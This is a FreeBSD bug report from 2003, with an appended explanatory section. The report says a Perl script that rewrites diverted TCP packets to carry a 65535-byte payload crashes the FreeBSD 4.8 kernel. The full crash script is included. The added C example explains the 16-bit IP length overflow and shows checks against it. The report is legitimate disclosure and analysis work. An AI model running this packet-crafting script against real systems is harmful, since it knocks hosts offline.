From njh@despammed.com  Thu Jul 10 01:10:17 2003
Return-Path: <njh@despammed.com>
Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125])
	by hub.freebsd.org (Postfix) with ESMTP id B907A37B401
	for <FreeBSD-gnats-submit@freebsd.org>; Thu, 10 Jul 2003 01:10:17 -0700 (PDT)
Received: from anchor-post-39.mail.demon.net (anchor-post-39.mail.demon.net [194.217.242.80])
	by mx1.FreeBSD.org (Postfix) with ESMTP id F38E143F93
	for <FreeBSD-gnats-submit@freebsd.org>; Thu, 10 Jul 2003 01:10:16 -0700 (PDT)
	(envelope-from njh@despammed.com)
Received: from mailgate.gec1testlab.co.uk ([80.177.181.146] helo=gsec1.com)
	by anchor-post-39.mail.demon.net with esmtp (Exim 3.36 #2)
	id 19aWVL-0001vA-0U
	for FreeBSD-gnats-submit@freebsd.org; Thu, 10 Jul 2003 09:10:15 +0100
Received: from 192.168.20.19 ([192.168.20.19]) by gsec1.com with Microsoft SMTPSVC(5.0.2195.5329);
	 Thu, 10 Jul 2003 09:11:30 +0100
Message-Id: <200307100910.14218.njh@despammed.com>
Date: Thu, 10 Jul 2003 09:10:14 +0100
From: Nigel Horne <njh@despammed.com>
To: FreeBSD-gnats-submit@freebsd.org
Subject: TCP Packet of 64K-1 crashes FreeBSD4.8

>Number:         54309
>Category:       kern
>Synopsis:       TCP Packet of 64K-1 crashes FreeBSD4.8
>Confidential:   no
>Severity:       serious
>Priority:       medium
>Responsible:    silby
>State:          open
>Quarter:        
>Keywords:       
>Date-Required:  
>Class:          sw-bug
>Submitter-Id:   current-users
>Arrival-Date:   Thu Jul 10 01:20:21 PDT 2003
>Closed-Date:    
>Last-Modified:  Thu Jul 10 23:11:09 PDT 2003
>Originator:     Nigel Horne
>Release:        FreeBSD 4.8-RELEASE i386
>Organization:
NJH Music
>Environment:
System: FreeBSD gsec1.itac-uk.com 4.8-RELEASE FreeBSD 4.8-RELEASE #0: Wed Jul 9 13:46:32 BST 2003 njh@dev.itac.local:/usr/obj/usr/src/sys/NJHKERNEL i386

        IBM, FreeBSD4.8
>Description:

        A simple Perl program (see attached) causes a kernel page fault.
>How-To-Repeat:
#!/usr/bin/perl -wT

# To be run as root under FreeBSD
# First do: ipfw add divert 9999 tcp from any to <ip> 3994
# Where <ip> is the IP address of the prodigy, e.g. 192.168.3.40
# You may need to reconfigure BSD first to support ipfw:
# options         IPFIREWALL
# options         IPDIVERT
# options         IPFIREWALL_FORWARD
# options         IPFIREWALL_VERBOSE
# options         IPFIREWALL_VERBOSE_LIMIT=100
# options         IPFIREWALL_DEFAULT_TO_ACCEPT
# options         IPFILTER
# options         IPFILTER_LOG
# options         TCPDEBUG
# options         TCP_DROP_SYNFIN
# options         ICMP_BANDLIM
# options         DUMMYNET
# options         IPSTEALTH
#
# Then try telnet 192.168.3.40 3994, sit back and watch the output

use strict;
use Net::Divert;
use NetPacket::IP;
use NetPacket::TCP;

my $ipFilter = Net::Divert->new('dev.gsec1.local', 9999);

$ipFilter->getPackets(\&handler);

sub handler {
        my($packet, $fwtag) = @_;

        my $ip = NetPacket::IP->decode($packet);

        if($ip->{proto} == NetPacket::IP->IP_PROTO_TCP) {
                my $tcp = NetPacket::TCP->decode($ip->{data});

                print "source " . $tcp->{src_port} . " dest " . $tcp->{dest_port} . "\n";

                # $tcp->{flags} |= SYN;
                # $tcp->{flags} &= ~ACK;

                # $tcp->{seqnum} = 0;

                # Replace the TCP payload with a 64K-1 byte body before reinjecting
                $tcp->{data} = 'x' x 65535;

                $ip->{data} = $tcp->encode($ip);

                $packet = $ip->encode;

        }
        $ipFilter->putPacket($packet, $fwtag);
}
>Fix:

-- 
Nigel Horne. Arranger, Composer, Conductor, Typesetter.
Owner of the brass band group of the Internet. ICQ#20252325
njh@bandsman.co.uk http://www.bandsman.co.uk/music.htm
>Release-Note:
>Audit-Trail:
Responsible-Changed-From-To: freebsd-bugs->silby 
Responsible-Changed-By: silby 
Responsible-Changed-When: Thu Jul 10 23:10:57 PDT 2003 
Responsible-Changed-Why:  
I'd better look at this... 

http://www.freebsd.org/cgi/query-pr.cgi?pr=54309 
>Unformatted:
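An added example that is not part of PR 54309 or of FreeBSD's own code: it works through, in C, what the How-To-Repeat script above does to an IPv4 packet when it writes 65535 bytes of TCP payload. With 20-byte IP and TCP headers the datagram needs 65575 bytes, which does not fit the 16-bit total-length field; storing it in 16 bits keeps 65575 mod 65536 = 39, so the reinjected packet announces a length shorter than its own two headers. The PR does not say that this truncation is what drives the page fault, and the example does not claim that either; it shows the arithmetic, the producer-side bound a divert filter should enforce before reinjecting, and the receiver-side consistency check. Header offsets follow RFC 791 and RFC 793; the function names and the constructed packet are this example's own.

```c
/*
 * Added example, not code from PR 54309 or from FreeBSD.  Shows why a
 * 65535-byte TCP payload cannot be described by the 16-bit IPv4 total
 * length field, and the checks a packet-rewriting filter should apply.
 * Header layout follows RFC 791 and RFC 793; all names are this example's own.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IP_HDR_LEN   20u     /* IPv4 header without options */
#define TCP_HDR_LEN  20u     /* TCP header without options */
#define IP_MAX_LEN   65535u  /* largest value the 16-bit ip_len can carry */

/* Bytes a packet with minimal headers and this payload really occupies. */
static uint32_t needed_total_len(uint32_t payload_len)
{
    return IP_HDR_LEN + TCP_HDR_LEN + payload_len;
}

/* What lands in ip_len once the real length is truncated to 16 bits. */
static uint16_t stored_ip_len(uint32_t payload_len)
{
    return (uint16_t)(needed_total_len(payload_len) & 0xffffu);
}

/* Producer-side bound: the largest TCP payload that still fits. */
static uint32_t max_tcp_payload(void)
{
    return IP_MAX_LEN - IP_HDR_LEN - TCP_HDR_LEN;
}

static int payload_fits(uint32_t payload_len)
{
    return payload_len <= max_tcp_payload();
}

/* Build a minimal IPv4/TCP packet the way the PoC does: headers, then
 * payload_len bytes of 'x', with ip_len set to the truncated value.
 * Returns the number of bytes actually written (0 if buf is too small). */
static size_t build_packet(uint8_t *buf, size_t cap, uint32_t payload_len)
{
    uint32_t total = needed_total_len(payload_len);
    uint16_t ip_len = stored_ip_len(payload_len);
    if (total > cap)
        return 0;
    memset(buf, 0, total);
    buf[0] = 0x45;                          /* version 4, IHL = 5 words */
    buf[2] = (uint8_t)(ip_len >> 8);        /* total length, big-endian */
    buf[3] = (uint8_t)(ip_len & 0xff);
    buf[8] = 64;                            /* TTL */
    buf[9] = 6;                             /* protocol = TCP */
    buf[IP_HDR_LEN + 12] = 0x50;            /* TCP data offset = 5 words */
    memset(buf + IP_HDR_LEN + TCP_HDR_LEN, 'x', payload_len);
    return total;
}

/* Receiver-side check: ip_len must not exceed the bytes we hold (padding
 * beyond ip_len is allowed) and must be large enough for the IP header and,
 * for TCP, the TCP header it announces. */
static int ip_tcp_consistent(const uint8_t *pkt, size_t wire_len)
{
    if (wire_len < IP_HDR_LEN || (pkt[0] >> 4) != 4)
        return 0;
    size_t ihl = (size_t)(pkt[0] & 0x0f) * 4;
    size_t ip_len = ((size_t)pkt[2] << 8) | pkt[3];
    if (ihl < IP_HDR_LEN || ip_len < ihl || ip_len > wire_len)
        return 0;
    if (pkt[9] == 6) {                      /* TCP: its header must fit too */
        if (ip_len < ihl + TCP_HDR_LEN)
            return 0;
        size_t doff = (size_t)(pkt[ihl + 12] >> 4) * 4;
        if (doff < TCP_HDR_LEN || ihl + doff > ip_len)
            return 0;
    }
    return 1;
}

/* Large enough for the oversized PoC packet (20 + 20 + 65535 bytes). */
static uint8_t g_buf[IP_HDR_LEN + TCP_HDR_LEN + IP_MAX_LEN];

int main(void)
{
    uint32_t sizes[2] = { 65535u, 0u };     /* PoC payload, then the bound */
    sizes[1] = max_tcp_payload();
    for (int i = 0; i < 2; i++) {
        uint32_t p = sizes[i];
        size_t n = build_packet(g_buf, sizeof g_buf, p);
        printf("payload %u: needs %u bytes, ip_len stores %u, fits=%d, receiver accepts=%d\n",
               p, needed_total_len(p), stored_ip_len(p), payload_fits(p),
               ip_tcp_consistent(g_buf, n));
    }
    return 0;
}
```

The producer-side bound is the one the PoC deliberately violates: 65535 bytes of payload exceed max_tcp_payload() by 40 bytes, the two headers. The receiver-side check rejects the resulting packet for a reason that needs no knowledge of the payload at all: an ip_len of 39 cannot hold a 20-byte IP header plus a 20-byte TCP header.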
